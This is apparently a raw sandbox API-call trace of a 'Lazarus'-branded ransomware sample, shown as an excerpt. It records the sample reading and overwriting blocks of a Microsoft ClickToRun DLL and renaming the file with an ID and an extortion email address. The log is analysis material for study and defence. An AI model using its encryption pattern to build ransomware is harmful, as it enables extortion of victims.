(lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.741] GetLastError () returned 0x20 [0075.741] GetLastError () returned 0x20 [0075.741] SetLastError (dwErrCode=0x20) [0075.741] GetLastError () returned 0x20 [0075.741] SetLastError (dwErrCode=0x20) [0075.741] GetLastError () returned 0x20 [0075.741] SetLastError (dwErrCode=0x20) [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0075.741] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.741] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.741] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x18d60800, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x1ae0a8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppvIsvSubsystems32.dll", cAlternateFileName="AP3342~1.DLL")) returned 1 [0075.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0075.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0075.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0075.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0075.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0075.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0075.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0075.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0075.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0075.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0075.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0076.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0076.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0076.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0076.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0076.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0076.016] AreFileApisANSI () returned 1 [0076.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll", lpUsedDefaultChar=0x0) returned 82 [0076.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0076.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0076.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0076.016] AreFileApisANSI () returned 1 [0076.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f848 [0076.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5f848, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 82 [0076.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.017] GetFileType (hFile=0x430) returned 0x1 [0076.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0076.017] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0076.017] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0076.017] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0076.017] CloseHandle (hObject=0x430) returned 1 [0076.018] AreFileApisANSI () returned 1 [0076.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f848 [0076.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5f848, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 82 [0076.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.018] GetFileType (hFile=0x430) returned 0x1 [0076.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0076.018] CloseHandle (hObject=0x430) returned 1 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0076.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0076.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0076.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0076.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0076.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0076.020] AreFileApisANSI () returned 1 [0076.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f428 [0076.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 82 [0076.020] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x18d60800, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x1ae0a8)) returned 1 [0076.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0076.020] AreFileApisANSI () returned 1 [0076.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0076.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0076.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0076.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0076.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0076.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0076.020] GetLastError () returned 0x0 [0076.020] SetLastError (dwErrCode=0x0) [0076.020] AreFileApisANSI () returned 1 [0076.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f008 [0076.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5f008, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 82 [0076.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.020] GetFileType (hFile=0x430) returned 0x1 [0076.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0076.021] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0076.021] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0076.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0076.023] ReadFile (in: hFile=0x430, lpBuffer=0x92460, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0076.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0076.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0076.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df88 [0076.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x93468 [0076.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0076.025] GetLastError () returned 0x0 [0076.025] SetLastError (dwErrCode=0x0) [0076.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0076.025] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0076.025] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0076.026] WriteFile (in: hFile=0x430, lpBuffer=0x92460*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0076.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0076.026] CloseHandle (hObject=0x430) returned 1 [0076.290] AreFileApisANSI () returned 1 [0076.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x60088 [0076.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 82 [0076.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.290] GetFileType (hFile=0x430) returned 0x1 [0076.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0076.291] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0076.291] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0076.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.292] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0076.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0076.292] GetLastError () returned 0x0 [0076.292] SetLastError (dwErrCode=0x0) [0076.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0076.292] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0076.292] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0076.293] WriteFile (in: hFile=0x430, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0076.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.293] CloseHandle (hObject=0x430) returned 1 [0076.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0076.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8ad80 [0076.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0076.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0076.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0076.594] AreFileApisANSI () returned 1 [0076.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5fbb8 [0076.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5fbb8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 82 [0076.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5a6b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 144 [0076.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x8b218 [0076.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5a6b8, cbMultiByte=-1, lpWideCharStr=0x8b218, cchWideChar=144 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 144 [0076.594] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: 